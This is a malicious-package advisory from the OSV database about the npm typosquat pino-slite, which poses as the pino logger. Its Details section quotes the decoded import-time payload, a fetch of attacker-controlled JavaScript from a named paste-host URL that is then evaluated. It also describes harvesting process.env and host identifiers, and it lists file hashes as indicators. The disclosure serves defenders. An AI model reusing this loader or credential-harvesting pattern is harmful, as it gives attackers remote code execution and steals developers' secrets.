MAL-2026-6078

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pino-slite/MAL-2026-6078.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6078
Published
2026-06-17T21:40:46Z
Modified
2026-06-17T22:01:48.280824847Z
Summary
Malicious code in pino-slite (npm)
Details

Source: amazon-inspector (ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb)

pino-slite impersonates the legitimate pino logger: its README is titled 'pino-slite (Pino)' with badges and a homepage pointing to getpino.io, and its exported function is named pino. On require(), lib/writer.js (loaded transitively from the package main pino.js) decodes a base64 string and passes it to eval(atob(hash)). The decoded payload runs fetch('https://jsonkeeper.com/b/0DWFC').then(r=>r.json()).then(d=>{eval(d.ret);}), executing attacker-controlled JavaScript fetched from a mutable third-party paste host on every load. Immediately before the eval, the module assembles a data object containing {...process.env, version, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: <non-internal IPv4 MACs}; this object is in scope for the remotely fetched code, giving it a ready-made channel to exfiltrate the installer's full environment (CI secrets, AWS_*, NPM_TOKEN, GitHub tokens, etc.) and host identifiers. The package therefore combines a typosquat lure, an import-time RCE dropper that pulls from an attacker-controlled mutable URL, and an environment-credential harvester.

Database specific
{
    "malicious-packages-origins": [
        {
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006944",
            "import_time": "2026-06-17T21:42:18.197754588Z",
            "modified_time": "2026-06-17T21:40:46Z",
            "versions": [
                "4.1.16"
            ],
            "sha256": "7ed71e73ac59b29f0867d2fbb15fc0391049b1ba4fe3c7b310bfbd1e84067c9e"
        },
        {
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-006945",
            "import_time": "2026-06-17T21:42:18.296198728Z",
            "modified_time": "2026-06-17T21:40:49Z",
            "versions": [
                "4.1.12"
            ],
            "sha256": "ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb"
        }
    ]
}

Affected packages

npm / pino-slite

Package: npm / pino-slite
Affected ranges: 4.*
Affected versions: 4.1.12, 4.1.16

Database specific

indicators
{
    "package_integrity": [
        {
            "hashes": {
                "sha1": "1e3cc2363b6a71bdcb7ae8e3052c3b557fbbbd8f",
                "sha512_sri": "sha512-TUxVgdCfhTtdPbyD/tiDcnbJlDO8HxSebYFT2UBAHexWwVdEDqxT6uHDzdP0+uhHU0egoOWk5dY8NqCioL3+dA=="
            },
            "filename": "pino-slite-4.1.16.tgz"
        }
    ],
    "evidence_files": [
        {
            "path": "lib/writer.js",
            "tlsh": "c61104a195e7649816302be10cc74820bed5b3423197809cbabcc5d52fe7ce17195f70",
            "sha256": "b6a7f0998e9b8ce77f9492f1156159f143faded6f9d27a790d19e4af8a7d221f"
        },
        {
            "path": "package.json",
            "tlsh": "b3016425ce688e6309d92992882d1187aa60ad6b980cfc2c73c3631d0f8d57f19be57d",
            "sha256": "e84dbee6692b3b39e05a3f3a0873c248336ce1690c1d3141f0ae2e12466c016b"
        }
    ]
}
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pino-slite/MAL-2026-6078.json"